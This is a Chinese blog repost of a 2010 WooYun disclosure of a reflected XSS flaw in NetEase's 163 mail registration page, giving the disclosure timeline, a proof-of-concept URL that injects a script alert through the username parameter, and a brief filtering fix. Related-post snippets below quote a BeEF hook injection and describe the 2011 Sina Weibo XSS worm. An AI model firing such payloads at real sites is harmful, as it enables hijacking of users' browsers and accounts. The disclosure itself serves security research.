网易的XSS

原创 于 2022-04-20 08:35:53 发布 · 4k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全 #安全 #hack #wooyun

本文回顾了2010年一个关于XSS漏洞的详细过程,从最初厂商处理到公开,展示了攻击原理、恶意代码执行和修复措施。重点在于动态数据展示如何导致用户浏览器被操控。

漏洞详情

披露状态:

2010-08-02: 细节已通知厂商并且等待厂商处理中
2010-08-03: 厂商已经确认,细节仅向厂商公开
2010-08-13: 细节向核心白帽子及相关领域专家公开
2010-08-23: 细节向普通白帽子公开
2010-09-02: 细节向实习白帽子公开
2010-09-06: 细节向公众公开

简要描述:

一个不痛不痒的 XSS

详细说明:

攻击者利用应用程序的动态展示数据功能,在html页面里嵌入恶意代码。当用户浏览该页之时,这些嵌入在html中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的

漏洞证明:

http://reg.email.163.com/mailregAll/reg0.jsp?from=163&tmp=&domain=&username='%22%3E%3Cscript%3Ealert(%22pow78781%22);%3C/script%3E%3C%22&birthday=&crypt=&reqtime=1280760452322&password=&passwordconfirm=

修复方案:

过滤不严导致的,对相关代码进行过滤即可

版权声明:转载请注明来源 黑色双刃剑@乌云

Sword-heart
关注
网易web安全五:课后问题-xxs
CPriLuke的博客
02-18 381
xxs概念 黑客通过“html注入”篡改网页,插入了恶意的脚本,当用户浏览网页时,实现控制用户浏览器行为的一种攻击方式 两个关键点:html包含恶意脚本, 黑客获取到用户cookie 常规工具:在查看前端攻击时,可以使用firebug进行查看hash数据 比如下图:当加载一个img失败时,执行onerror事件从而执行xss脚本 xss分类 **存储型:**需要经历两个步骤 1) 用户将xss脚...
2021Kali系列 -- XSS漏洞(Beef-xss
Web安全工具库
04-14 2082
​当我不欠任何人的时候,我就只欠我自己了。。。 ----网易云热评 一、安装beef-xss 输入beef-xss,提示安装,输入y 二、启动beef-xss 三、访问登陆页面: http://192.168.139.133:3000/ui/panel 四、让目标主机访问存在生成的钩子代码 http://192.168.139.129:81/dvwa/vulnerabilities/xss_r/?name=<script src="http://192.168.139.1.
新浪XSS漏洞
swordheart的博客
04-14 172
漏洞详情 披露状态: 2010-07-23: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-23: 细节向公众公开 简要描述: 新浪的一个XSS 详细说明: 攻击者利用应用程序的动态展示数据功能,在html页面里嵌入恶意代码。当用户浏览该页之时,这些嵌入在html中的恶意代码会被执行,用
新浪微博XSS攻击事件
TERRY的技术日志
06-29 3727
6月28日20时14分左右开始,新浪微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如:“郭美美事件的一些未注意到的细节”,“建 党大业中穿帮的地方”,“让女人心动的100句诗歌”,“3D肉团团高清普通话版种子”,“这是传说中的神仙眷侣啊”,“惊爆!范冰冰艳照真流出了”等等 微博消息和私信,并自动关注一位名为hellosamy的用户。  事件的经过线索如下:20:14,开始有大量带
[转]以新浪为例浅谈XSS
weixin_30279671的博客
01-12 114
随着网络时代的飞速发展,网络安全问题越来越受大家的关注,而SQL注入的攻击也随着各种防注入的出现开始慢慢的离我们而去,从而XSS跨站脚本攻击也慢慢的开始在最近几年崛起,也应对了’没有绝对的安全’这句话。 XSS攻击:它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。 大家刚接触XSS的时候和我大概也差不多,都是在不断的在各种搜索栏,地址栏中或...
以新浪为例浅谈XSS
Coisini的博客
06-21 297
随着网络时代的飞速发展,网络安全问题越来越受大家的关注,而SQL注入的攻击也随着各种防注入的出现开始慢慢的离我们而去,从而XSS跨站脚本攻击也慢慢的开始在最近几年崛起,也应对了’没有绝对的安全’这句话。 XSS攻击: 它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。 大家刚接触XSS的时候和我大概也差不多,都是在不断的在各种搜索栏,地址栏中或...
新浪微博的XSS漏洞攻击过程详解
weixin_34294649的博客
07-11 1553
今天晚上(2011年6月28日),新浪微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如:“郭美美事件的一些未注意到的细节”,“建 党大业中穿帮的地方”,“让女人心动的100句诗歌”,“3D肉团团高清普通话版种子”,“这是传说中的神仙眷侣啊”,“惊爆!范冰冰艳照真流出了”等等 微博和私信,并自动关注一位名为hellosamy的用户。 事件的经过线索如下: 20:14,开始有大量带V...
XSS存储型 网易云课堂
01-18
在“网易云课堂微专业-WEB安全工程师”课程中,深入探讨了这种类型的攻击。课程内容可能包括以下几个方面: 1. **XSS攻击原理**:讲解XSS攻击的基本概念,如何通过注入恶意脚本,劫持用户会话、盗取用户数据或者对...
XSS平台搭建及利用
Web安全工具库
05-27 1255
​男孩子要娶,就要娶一见你就笑的女生,女孩子要嫁就要嫁能让你笑的男生。。。 ---- 网易云热评 一、下载平台源码、拷贝到我们网站的根目录 https://github.com/anwilx/xss_platform 二、修改相关参数 1、config.php,数据库用户、密码、还有xss平台的访问路径 2、导入sql文件,测试的时候没法导入,所以就手动创建了数据库 新建数据库 打开xssplatform.sql,将里面的sql语句执行一遍 3、更新站点域名,将作者的域名.
精选资源
SpringBoot网易云音乐项目
08-06
8. **安全实践**:除了Shiro提供的基础安全功能,项目还可能涉及到密码加密存储、XSS和CSRF防护等安全措施,以防止数据泄露和恶意攻击。 综上所述,"SpringBoot网易云音乐项目"是一个涵盖了SpringBoot开发、Shiro...
发现新浪一注册漏洞
编程视觉
06-06 676
目前偶尔靠运气能出有验证码的wangy
新浪微博XSS攻击代码简要解析
首席技术执行官CTO(Chief Technology Officer)|技术总监--邓斌博客
11-14 2973
代码下载(来源鸽姆安全网) [javascript] view plaincopyprint?/**  *使用AJAX创建XMLHttpRequest对象,若不是IE浏览器,使用XMLHttpRequest创建XHR对象,  *否则使用ActiveXObject创建XHR对象。  */  function createXHR(){      return window.XMLHttpRequest
新浪网存在远程执行漏洞
swordheart的博客
04-11 270
漏洞详情 披露状态: 2010-07-16: 细节已通知厂商并且等待厂商处理中 2010-08-18: 细节向公众公开 简要描述: 新浪网可以远程执行代码,可能造成网站被入侵。 详细说明: 使用struts2的任意产品线,在默认配置情况下会导致任意java代码能够以webserver的权限执行。 如下url存在代码执行漏洞 http://caipiao.sc.sina.com.cn/cbportal/userinfo/showRegister.action http://caipiao.fj.s
搜狐通行证某处反射xss
swordheart的博客
04-12 184
漏洞详情 披露状态: 2010-07-16: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-18: 细节向公众公开 简要描述: 搜狐通行证某处反射xss 详细说明: 登录后状态下 http://passport.sohu.com/web/updateInfo.action?modifyT
XSS跨站脚本攻击实例讲解,新浪微博XSS漏洞过程分析
weixin_34186128的博客
07-11 671
2011年6月28日晚,新浪微博遭遇到XSS蠕虫攻击侵袭,在不到一个小时的时间,超过3万微博用户受到该XSS蠕虫的攻击。此事件给严重依赖社交网络的网友们敲响了警钟。在此之前,国内多家著名的SNS网站和大型博客网站都曾遭遇过类似的攻击事件,只不过没有形成如此大规模传播。虽然此次XSS蠕虫攻击事 件中,恶意黑客攻击者并没有在恶意脚本中植入挂马代码或其他窃取用户账号密码信息的脚本,但是这至少说明,病毒木...
网易跨域实现笔记以及顺便发现的XSS
Magicbreaker的专栏
12-25 2897
By:刺因为我认识的朋友里面国内各大网站都有,前两天发了校内网的bug,可是现在多了个校内网的朋友,不太好意思发那些例子。正好不认识网易的人,那就发网易的漏洞做典型吧,也许还能让我们的whitehat社区趁机扩大下。先说跨域实现的笔记,再讲漏洞。今天本来不是研究这个跨域实现问题,不过顺道看到了这个,做下笔记,暂时还没想到有什么安全隐患,哪位有创意的朋友可以仔细思考下里面是否存在问题,我也会找时间好
新浪微博的XSS攻击
joy
03-26 817
新浪微博的XSS攻击 http://coolshell.cn/articles/4914.html 阅读评论28,159 人阅读     今天晚上(2011年6月28日),新浪微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如:“郭美美事件的一些未注意到的细节”,“建党大业中穿帮的地方”,“让女人心动的100句诗歌”,“3D肉团团高清普通话版种子”,“这是传说
xss攻击之新浪微博xss蠕虫
zhangzhangdan的博客
07-21 2852
xss蠕虫:通过一个bug,感染其他结构都出现问题 我们根据一段xss攻击链接来看一下: 很显然,javascript代码被解析了,那它原型是什么呢,怎么看  通过这样我们可以看出,这段javascript代码是指向一个js文件,js文件中写的是一些文章标题链接,而这段链接也是携带这段javascript代码,这样当有人点击了这段链接,就又执行这个xss攻击操作了,这样一传十,十传百...
网易邮箱内嵌HtmlEditor文本编辑器功能解析
- **安全性**:集成文本编辑器时,需注意编辑器的安全性问题,防止潜在的跨站脚本攻击(XSS)和内容注入等安全风险。 ### 结论 网易邮箱文本编辑器是一个专门为邮箱服务设计的轻量级编辑工具,它拥有实用的编辑功能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值